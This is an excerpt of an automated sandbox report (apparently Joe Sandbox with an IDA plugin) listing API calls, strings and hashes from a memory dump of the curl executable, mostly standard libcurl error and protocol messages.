                                • schannel: can't renegotiate, encrypted data available, xrefs: 008A5ED1
                                • schannel: failed to read data from server: %s, xrefs: 008A5E8D
                                • schannel: server closed abruptly (missing close_notify), xrefs: 008A5F34
                                • schannel: remote party requests renegotiation, xrefs: 008A5DBC
                                • schannel: server closed the connection, xrefs: 008A5EE5
                                • schannel: enough decrypted data is already available, xrefs: 008A5B18
                                • schannel: an unrecoverable error occurred in a prior call, xrefs: 008A5B33
                                • schannel: renegotiating SSL/TLS connection, xrefs: 008A5DE5
                                • schannel: can't renegotiate, an error is pending, xrefs: 008A5EB7
                                • schannel: renegotiation failed, xrefs: 008A5EC1
                                • schannel: Curl_read_plain returned error %d, xrefs: 008A5C1F
                                • schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 008A5C0F
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renegotiate, an error is pending$schannel: can't renegotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                • API String ID: 0-3083360527
                                • Opcode ID: 5809a09e164b014d4ed192ea4045611d62013c8adfffd5cb698c038b3acb80db
                                • Instruction ID: b12c4f359586c69183088ed697c70f09698a1093a35a06cb0542e7b955bc9fb4
                                • Opcode Fuzzy Hash: 5809a09e164b014d4ed192ea4045611d62013c8adfffd5cb698c038b3acb80db
                                • Instruction Fuzzy Hash: 3AF1BE71608B06AFEB28CF28C841A6AB7F4FF49324F14452DF489D7A41D774E894CB96
                                APIs
                                  • Part of subcall function 00875D67: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0086A827,?,?,00000000), ref: 00875D7A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884013
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884025
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00884039
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$calloc
                                • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
                                • API String ID: 3095843317-874090715
                                • Opcode ID: ecb089df72f66d55883e32642ad052191e5504e72461e035f1b33fef1615ec3f
                                • Instruction ID: f1dad5191a1fdfdfe0bf442293cf8b3e51c704e743c6762b8ea67447373f6e7f
                                • Opcode Fuzzy Hash: ecb089df72f66d55883e32642ad052191e5504e72461e035f1b33fef1615ec3f
                                • Instruction Fuzzy Hash: 6CC1B371E042099BDB14AF58C845BBEBBB6FF84714F14802AE905F7391DF74AE018BA1
                                APIs
                                • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 008A3BC3
                                • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 008A3BE1
                                • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,LocalMachine,00000000), ref: 008A3C00
                                • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 008A3CC8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _mbschr_mbsnbcmp
                                • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
                                • API String ID: 866314863-3209074899
                                • Opcode ID: 72036c5e9e40135e0456918a65d958f6992890894f12ec759b1074dc6d15149a
                                • Instruction ID: 873b21d50e832c01151de3b9e9cd79277394094e32d4cd9701fd25ff83ab725b
                                • Opcode Fuzzy Hash: 72036c5e9e40135e0456918a65d958f6992890894f12ec759b1074dc6d15149a
                                • Instruction Fuzzy Hash: 5A41BE70205706EFFB115F25AC89B2B7BA9FB92768F204029F841F3742E7B48A189651
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,0086F2DD,?,?,?,0086F296), ref: 0086F06B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,0086F2DD,?,?,?,0086F296), ref: 0086F0B1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,0086F2DD,?,?,?,0086F296), ref: 0086F0F7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,0086F2DD,?,?,?,0086F296), ref: 0086F13D
                                  • Part of subcall function 0086EEAB: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,0086F2DD,?,?,?,0086F296), ref: 0086F1C0
                                  • Part of subcall function 0086E9EB: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 0086EA46
                                Strings
                                • curl_mime_filename(part%d, NULL);, xrefs: 0086EFBE
                                • part%d = curl_mime_addpart(mime%d);, xrefs: 0086EEE9
                                • curl_mime_name(part%d, "%s");, xrefs: 0086F11A
                                • (curl_seek_callback) fseek, NULL, stdin);, xrefs: 0086EF61
                                • curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 0086EF45
                                • curl_mime_encoder(part%d, "%s");, xrefs: 0086F08E
                                • mime%d = NULL;, xrefs: 0086F048
                                • curl_mime_subparts(part%d, mime%d);, xrefs: 0086F029
                                • curl_mime_headers(part%d, slist%d, 1);, xrefs: 0086F198
                                • slist%d = NULL;, xrefs: 0086F1AF
                                • curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 0086EFF3
                                • curl_mime_type(part%d, "%s");, xrefs: 0086F160
                                • curl_mime_filedata(part%d, "%s");, xrefs: 0086EF8D
                                • curl_mime_filename(part%d, "%s");, xrefs: 0086F0D4
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$malloc
                                • String ID: (curl_seek_callback) fseek, NULL, stdin);$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
                                • API String ID: 2190258309-2644548734
                                • Opcode ID: 3b847429c11dcdda812dcc2787c25ed9c9c6187c21c558b86937abd138aef5c1
                                • Instruction ID: 2810fcebe671bf35ab49d8edea66bc6d87d05a4ee70e6d79a1bf4066820dc4ec
                                • Opcode Fuzzy Hash: 3b847429c11dcdda812dcc2787c25ed9c9c6187c21c558b86937abd138aef5c1
                                • Instruction Fuzzy Hash: 8281C737944610EB9F265A98AC45E6A3771FF42770B264268FE34E63C7EF35CE008642
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: $%%%02x
                                • API String ID: 0-2848173732
                                • Opcode ID: 5050fc09b6bd7d697c578884cde930507cfd0984a0336c0fb2a95676a1e21429
                                • Instruction ID: 63a2e21803e050c24d374d5ff74778962c4c4a87d182d339ad6fca8234b0759f
                                • Opcode Fuzzy Hash: 5050fc09b6bd7d697c578884cde930507cfd0984a0336c0fb2a95676a1e21429
                                • Instruction Fuzzy Hash: 34F12330A04A0A9BDF188F24D8407BDBFB1FF55354F28C16AD84AE739AEB35D9158B50
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000078,00000000,?,?,?,?,0086D002), ref: 00870658
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000025,00000000,?,?,?,0086D002), ref: 00870699
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_funcfputc
                                • String ID: %header{$curl: unknown --write-out variable: '%s'$header{
                                • API String ID: 2340846889-221383536
                                • Opcode ID: 4e5016f4f33a588fe98ac6a4fd2e56ef26e5d5ab52a13c937a8dc79b08c8d03a
                                • Instruction ID: 60022978bc42c73bad034803cc9bc47b3b77514b7b2255c90d47165fc2d6ab71
                                • Opcode Fuzzy Hash: 4e5016f4f33a588fe98ac6a4fd2e56ef26e5d5ab52a13c937a8dc79b08c8d03a
                                • Instruction Fuzzy Hash: 19514A31904344DBEF248B649C49B6A7BF4FB46754F28C059E45EDB38AD6B6E800CE92
                                APIs
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00897789
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 008977FC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: strtol
                                • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                • API String ID: 76114499-360479797
                                • Opcode ID: ed35981cb4720376668cfc0854422323ffa567a7b590176ad64bbbbbe4ec3f24
                                • Instruction ID: aef953d637843700e63421849ff7595854e2d3e49648fe8aa89d542816af91c0
                                • Opcode Fuzzy Hash: ed35981cb4720376668cfc0854422323ffa567a7b590176ad64bbbbbe4ec3f24
                                • Instruction Fuzzy Hash: 87510671F48305ABDF04AA688C46F7E37B9FF84704F184479E51AF6385E674D9008AA5
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,000001B8,?), ref: 008AEE3F
                                • GetFileSizeEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 008AEEC6
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008AEED1
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AEF3A
                                • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,00000000), ref: 008AEF76
                                • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 008AEFC1
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008AF006
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,000001B8,?), ref: 008AEE50
                                  • Part of subcall function 0087A1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A1AB
                                  • Part of subcall function 0087A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A1B3
                                  • Part of subcall function 0087A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A1E9
                                  • Part of subcall function 0087A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A1F6
                                  • Part of subcall function 0087A1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A1FE
                                  • Part of subcall function 0087A1A0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A209
                                • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,000001B8,?), ref: 008AEE8F
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008AEEA1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AEFDB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008AEFE9
                                Strings
                                • schannel: invalid path name for CA file '%s': %s, xrefs: 008AEE66
                                • schannel: failed to determine size of CA file '%s': %s, xrefs: 008AEEE7
                                • schannel: failed to open CA file '%s': %s, xrefs: 008AEEB7
                                • schannel: failed to read from CA file '%s': %s, xrefs: 008AF021
                                • schannel: CA file exceeds max size of %u bytes, xrefs: 008AEF18
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast$File_errno$free$CloseCreateHandleReadSize_strdupmalloc
                                • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                                • API String ID: 1064901726-3430970913
                                • Opcode ID: b7c4a05922de74360f6556d58c8fd1d26396cb8118654e3c4de9fbf0788ceeb2
                                • Instruction ID: 2c3bf1617fc79534159ae66389ff20df8a715d2bea6a7ce10860a183c4f73bb3
                                • Opcode Fuzzy Hash: b7c4a05922de74360f6556d58c8fd1d26396cb8118654e3c4de9fbf0788ceeb2
                                • Instruction Fuzzy Hash: 1951E771A00219AFEB255B24DC06FEE77B9FB49710F1049D9F609E7281DBB49D808F91
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089623D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008962C2
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089634C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00896382
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00896484
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089649E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008964B2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: AUTH=$ SIZE=$ SMTPUTF8$%I64d$<%s>$<%s@%s>$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0
                                • API String ID: 1294909896-2994854565
                                • Opcode ID: 9670d93b49371f9201a980b92d20b28651e27c9724af59c8bf9af70cfda083c2
                                • Instruction ID: edd9056f85bc94a2b1c7c1352dfb763692b54c44fbbeae0b88252a962792a900
                                • Opcode Fuzzy Hash: 9670d93b49371f9201a980b92d20b28651e27c9724af59c8bf9af70cfda083c2
                                • Instruction Fuzzy Hash: 2DC1E571B0461ADFDF14ABA4DC50AAEBBB5FF45310F2C816AE805E3341EB71AD108B90
                                APIs
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00863167), ref: 00870E2C
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00870E41
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008741F8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087420C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                • API String ID: 1294909896-1595554923
                                • Opcode ID: eeda95e8e507809d0a18f867771a4879c7f4192bed15ba9e189d9f21b1f717f4
                                • Instruction ID: 35171e43a2ba6a069d96a12a2474fd814a1d62dfee51a8a000487095314be226
                                • Opcode Fuzzy Hash: eeda95e8e507809d0a18f867771a4879c7f4192bed15ba9e189d9f21b1f717f4
                                • Instruction Fuzzy Hash: F8B1A131B00A06EBDB18DAA9C490B6AB7A5FF54314F14D03EE909D7B89DB70ED54CB81
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 0088AB92
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088AC3A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088AC4F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088ACD1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088ACE6
                                Strings
                                • Read callback asked for PAUSE when not supported, xrefs: 0088AD69
                                • read function returned funny value, xrefs: 0088ADA9
                                • Malformatted trailing header, skipping trailer, xrefs: 0088ABDD
                                • Signaling end of chunked upload via terminating chunk., xrefs: 0088AE65
                                • operation aborted by trailing headers callback, xrefs: 0088AC95
                                • Successfully compiled trailers., xrefs: 0088AC11
                                • *, xrefs: 0088ACA5
                                • operation aborted by callback, xrefs: 0088AD40
                                • Signaling end of chunked upload after trailers., xrefs: 0088AF0B
                                • %zx%s, xrefs: 0088AE06
                                • Moving trailers state machine from initialized to sending., xrefs: 0088AB00
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$___from_strstr_to_strchr
                                • String ID: %zx%s$*$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                • API String ID: 622630536-1407958152
                                • Opcode ID: c3128fa748c8ea71cee77c91cceeb2c490161600ddfd7741546db8f4ef48cb4a
                                • Instruction ID: 974a2d1e4c074a1c5a6b2eeb067947b7bae28aeb8d144446029550b59895d834
                                • Opcode Fuzzy Hash: c3128fa748c8ea71cee77c91cceeb2c490161600ddfd7741546db8f4ef48cb4a
                                • Instruction Fuzzy Hash: 5DD1D4719042059FEF19DF68C891BE97BB2FF48320F18417AD809EB286DB75AC45CB61
                                APIs
                                  • Part of subcall function 00872813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00872848
                                • _strrchr.LIBCMT ref: 0089E194
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 0089E1C3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E1E3
                                Strings
                                • Uploading to a URL without a file name, xrefs: 0089E380
                                • Request has same path as previous transfer, xrefs: 0089E41F
                                • path contains control characters, xrefs: 0089E154
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strrchrcallocfreemalloc
                                • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                                • API String ID: 2159935718-4131979473
                                • Opcode ID: f5655feab2c3ba8fffff71a839b392dd4c99a505b822975feb3d170e1cc584aa
                                • Instruction ID: 14bc4abef2222d628de9faa0d80c1b00ded908f39ab23e30237014b3c6a82c38
                                • Opcode Fuzzy Hash: f5655feab2c3ba8fffff71a839b392dd4c99a505b822975feb3d170e1cc584aa
                                • Instruction Fuzzy Hash: 70A1AC71A0460A9FDF24EFA8D844AAE7BF5FF49350F18406EE946E7381DB71AC008B54
                                APIs
                                  • Part of subcall function 0087FA05: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,?,0088128E,?,?,00880F71,00000000,?,00000001), ref: 0087FA12
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,0088128E,?), ref: 00880F81
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,008B6C58,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,0088128E), ref: 00880FD2
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.,00000000,?,?,?,?,?,?,?,?,?,?,0088128E,?,?,754C3C50), ref: 00880FED
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088101B
                                • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,00000004,00880B10), ref: 0088105E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008810A0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008810C0
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,0088128E,?,?,754C3C50,00000000,0088182F), ref: 008810CA
                                  • Part of subcall function 008950DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 0089510A
                                  • Part of subcall function 008950DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 00895118
                                  • Part of subcall function 008950DE: MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 00895166
                                  • Part of subcall function 008950DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00895175
                                  • Part of subcall function 008950DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00895181
                                • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?,?,?,?,?,?,?,0088128E,?,?,754C3C50,00000000,0088182F), ref: 008810E0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0088128E,?,?,754C3C50,00000000,0088182F), ref: 008810FA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,0088128E,?,?,754C3C50,00000000,0088182F), ref: 0088113C
                                Strings
                                • %s, xrefs: 00881083
                                • # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00880FE8
                                • %s.%s.tmp, xrefs: 00880FB2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
